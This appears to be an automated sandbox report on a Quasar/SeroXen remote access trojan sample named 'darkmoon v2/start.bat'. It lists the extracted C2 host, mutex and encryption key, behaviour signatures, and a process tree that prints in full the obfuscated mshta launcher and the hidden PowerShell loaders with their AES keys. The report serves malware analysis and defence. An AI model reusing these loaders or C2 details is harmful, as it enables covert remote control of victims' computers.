Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-06-2024 15:40

General

  • Target

    darkmoon v2/start.bat

  • Size

    82B

  • MD5

    e6ede72374e4f7b8b907d4099c76f4d4

  • SHA1

    146899cf959ada383b0a258b06da7963ef0d1c70

  • SHA256

    c07fbd6c49d83eb8399435f9972551d2c73a29e5914a25640639191d187dd80d

  • SHA512

    1b2d0cd4a5deae331ed16f383831f4ff7ba1c5b7f6906a35354dfd420ca44f17e3469157f2327685a6aa9773175425aa145faa2d4866030d131334eb36426fcc

Malware Config

Extracted

Family

quasar

Version

1.0.0.0

Botnet

v2.2.6 | SeroXen

C2

seroooooxeen.chickenkiller.com:5059

Mutex

f953c0af-702a-46b5-ad07-d900b11c5cd9

Attributes
  • encryption_key

    458790DC6E62EEB3043B4566BF95CDAF711F1EC0

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    3000

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 18 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 13 IoCs
  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 54 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{4ece7727-0a4c-4a11-bd24-002bf7959736}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:224
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6767c65b-c7a3-4d29-8608-562cdc89d3dd}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1504
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{1cac88b7-cdbc-4b17-99be-cf1acb6e3c96}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3208
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{aed9537c-f03d-4efd-85d3-c45ae9169c1b}
          2⤵
            PID:4492
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{e10713c2-bbde-4b87-9e39-1da6360d144f}
            2⤵
              PID:1564
            • C:\Windows\System32\dllhost.exe
              C:\Windows\System32\dllhost.exe /Processid:{d355d62f-d789-4c44-861c-05be92748e81}
              2⤵
                PID:5260
              • C:\Windows\System32\dllhost.exe
                C:\Windows\System32\dllhost.exe /Processid:{35989aee-aa7a-4022-ad67-565e5bfc2865}
                2⤵
                  PID:4372
                • C:\Windows\System32\dllhost.exe
                  C:\Windows\System32\dllhost.exe /Processid:{41745c89-5895-43c1-808a-b07b2c909550}
                  2⤵
                    PID:4364
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{ca4776d6-250b-42e9-ae9d-d9e8fc1cf978}
                    2⤵
                      PID:4676
                  • C:\Windows\system32\lsass.exe
                    C:\Windows\system32\lsass.exe
                    1⤵
                      PID:684
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                      1⤵
                        PID:960
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                        1⤵
                          PID:740
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                          1⤵
                            PID:868
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                            1⤵
                              PID:1076
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                              1⤵
                                PID:1084
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                1⤵
                                • Drops file in System32 directory
                                PID:1132
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                1⤵
                                • Drops file in System32 directory
                                PID:1164
                                • C:\Windows\system32\taskhostw.exe
                                  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                  2⤵
                                    PID:2800
                                  • C:\Windows\$sxr-mshta.exe
                                    C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
                                    2⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious use of WriteProcessMemory
                                    PID:4480
                                    • C:\Windows\$sxr-cmd.exe
                                      "C:\Windows\$sxr-cmd.exe" /c %$sxr-fIvAWqRzQvWuAstOtyuG4312:&#<?=%
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of WriteProcessMemory
                                      PID:3524
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        4⤵
                                          PID:2936
                                        • C:\Windows\$sxr-powershell.exe
                                          C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                          4⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of SetWindowsHookEx
                                          PID:4608
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{3013fe19-0fdb-41af-abea-30ba7c50d24a}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:4504
                                          • C:\Windows\$sxr-powershell.exe
                                            "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4608).WaitForExit();[System.Threading.Thread]::Sleep(5000); function cZwGr($wJEcK){ $AFKcp=[System.Security.Cryptography.Aes]::Create(); $AFKcp.Mode=[System.Security.Cryptography.CipherMode]::CBC; $AFKcp.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $AFKcp.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw='); $AFKcp.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A=='); $Czfqh=$AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')(); $jNjPg=$Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wJEcK, 0, $wJEcK.Length); $Czfqh.Dispose(); $AFKcp.Dispose(); $jNjPg;}function nyZgh($wJEcK){ $zAUTt=New-Object System.IO.MemoryStream(,$wJEcK); $GiIcD=New-Object System.IO.MemoryStream; $IbKVT=New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::Decompress); $IbKVT.CopyTo($GiIcD); $IbKVT.Dispose(); $zAUTt.Dispose(); $GiIcD.Dispose(); $GiIcD.ToArray();}function JitsM($wJEcK,$KvmVX){ $hfTYl=[System.Reflection.Assembly]::Load([byte[]]$wJEcK); $vpjLB=$hfTYl.EntryPoint; $vpjLB.Invoke($null, $KvmVX);}$AFKcp1 = New-Object System.Security.Cryptography.AesManaged;$AFKcp1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$MfWDX = $AFKcp1.('rotpyrceDetaerC'[-1..-15] -join '')();$OXRcs = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/Ud8pMApbv/gxu+JXtMI7A==');$OXRcs = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs, 0, $OXRcs.Length);$OXRcs = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs);$MJSJO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3VJkIni/eEgLNMCmmbuF+9uJHd2ZxHH9BvEMmnfuAs4=');$MJSJO = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MJSJO, 0, $MJSJO.Length);$MJSJO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MJSJO);$eldAL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MUqFa/ybH7fq9E8cDwzQqA==');$eldAL = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($eldAL, 0, $eldAL.Length);$eldAL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($eldAL);$JmtWK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RNiqtzRUbqzid5tIIG0tdSQQSCND4N3Fip71HpyVpNu/LbAnkQDXvXCNN67DnhoH5Y27G2MJlveDAN7CWQjo2dJc4tmKQnvASHPTcy0RyGxkDhbwoL6OdXRgiYeimaZ3i49J/rxWBNL33jIrXjV6wccc/4aVjVPEYt/lsF5IHcTecs+F97GmTz/xlfrGHuS+klKIHdbsKNtk359gBlEuyIzqc8ZNoXjIsDYcHPmRQW0ppscjiU1/jln8klv2aIxKfUrd3GQUbnHsQMaMF/hqOHe+EY+XH4G0NlTI/p6Gfj6oZBnjn21FQDxykIFEupy9SA9V6u+rIOYPN2aHFGH15vJWjy68WQLa9uRRD0iNI3+fN5lBaMhngNS166V7oDsfk6HFYYqd4SbkPV+So/C260QI7aUZVElJYwH9zWeJN68=');$JmtWK = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($JmtWK, 0, $JmtWK.Length);$JmtWK = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($JmtWK);$sutWG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('721Pgwb2TpdFalOhddbR8A==');$sutWG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sutWG, 0, $sutWG.Length);$sutWG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sutWG);$RmeiH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sYsCTgz2k9CJtXOv5QOESQ==');$RmeiH = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RmeiH, 0, $RmeiH.Length);$RmeiH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RmeiH);$yKibX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5yBJCVjGNNI8c4y5TeJZ1g==');$yKibX = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yKibX, 0, $yKibX.Length);$yKibX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yKibX);$mWhwt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HFsj1rvOoFy/1AQ35wf56A==');$mWhwt = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mWhwt, 0, $mWhwt.Length);$mWhwt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mWhwt);$MQVoG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S8OL2bqVmk+GN3goxj/uiw==');$MQVoG = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MQVoG, 0, $MQVoG.Length);$MQVoG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MQVoG);$OXRcs0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('spJ+lRLXqmjOi3nI0UTS5g==');$OXRcs0 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs0, 0, $OXRcs0.Length);$OXRcs0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs0);$OXRcs1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U4iTk4zuVeeTIShJARv6Pg==');$OXRcs1 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs1, 0, $OXRcs1.Length);$OXRcs1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs1);$OXRcs2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9xaq7OLHlKH+W6faIqwAMw==');$OXRcs2 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs2, 0, $OXRcs2.Length);$OXRcs2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs2);$OXRcs3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JOLtcnTz9Wy99GrNQ2MuMQ==');$OXRcs3 = $MfWDX.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OXRcs3, 0, $OXRcs3.Length);$OXRcs3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OXRcs3);$MfWDX.Dispose();$AFKcp1.Dispose();if (@(get-process -ea silentlycontinue $OXRcs3).count -gt 1) {exit};$lJYQx = [Microsoft.Win32.Registry]::$mWhwt.$yKibX($OXRcs).$RmeiH($MJSJO);$mFwmU=[string[]]$lJYQx.Split('\');$xwjch=nyZgh(cZwGr([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[1])));JitsM $xwjch (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$Alykr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mFwmU[0]);$AFKcp = New-Object System.Security.Cryptography.AesManaged;$AFKcp.Mode = [System.Security.Cryptography.CipherMode]::CBC;$AFKcp.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$AFKcp.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7nINuvUxCngtiDkTmFd6bpYzxvDppzo+LtAuTzEtPzw=');$AFKcp.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('U+YH3s5ugGzDC7KmLj1l/A==');$Czfqh = $AFKcp.('rotpyrceDetaerC'[-1..-15] -join '')();$Alykr = $Czfqh.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Alykr, 0, $Alykr.Length);$Czfqh.Dispose();$AFKcp.Dispose();$zAUTt = New-Object System.IO.MemoryStream(, $Alykr);$GiIcD = New-Object System.IO.MemoryStream;$IbKVT = New-Object System.IO.Compression.GZipStream($zAUTt, [IO.Compression.CompressionMode]::$OXRcs1);$IbKVT.$MQVoG($GiIcD);$IbKVT.Dispose();$zAUTt.Dispose();$GiIcD.Dispose();$Alykr = $GiIcD.ToArray();$hUYCw = $JmtWK | IEX;$hfTYl = $hUYCw::$OXRcs2($Alykr);$vpjLB = $hfTYl.EntryPoint;$vpjLB.$OXRcs0($null, (, [string[]] ($eldAL)))
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2292
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{e27bc9c8-ba9c-4820-8ae5-45d0182a8a25}
                                            5⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3204
                                          • C:\Windows\SysWOW64\dllhost.exe
                                            C:\Windows\SysWOW64\dllhost.exe /Processid:{87274eb5-6493-4cb4-95b9-143d3fd0f4a3}
                                            5⤵
                                              PID:1596
                                            • C:\Windows\SysWOW64\dllhost.exe
                                              C:\Windows\SysWOW64\dllhost.exe /Processid:{a0df8394-7b69-471e-a352-7afaee94a492}
                                              5⤵
                                                PID:856
                                              • C:\Windows\SysWOW64\dllhost.exe
                                                C:\Windows\SysWOW64\dllhost.exe /Processid:{8f23cbda-aa66-4dbf-b72d-94ab2902dd67}
                                                5⤵
                                                  PID:5448
                                                • C:\Windows\SysWOW64\dllhost.exe
                                                  C:\Windows\SysWOW64\dllhost.exe /Processid:{bf36f566-96a0-447c-9e84-fad8074a8779}
                                                  5⤵
                                                    PID:5504
                                                  • C:\Windows\SysWOW64\dllhost.exe
                                                    C:\Windows\SysWOW64\dllhost.exe /Processid:{99394c4e-5a08-4622-9ba4-aaebaffb27fa}
                                                    5⤵
                                                      PID:2748
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2748 -s 456
                                                        6⤵
                                                        • Drops file in Windows directory
                                                        • Program crash
                                                        • Checks processor information in registry
                                                        • Enumerates system info in registry
                                                        PID:4080
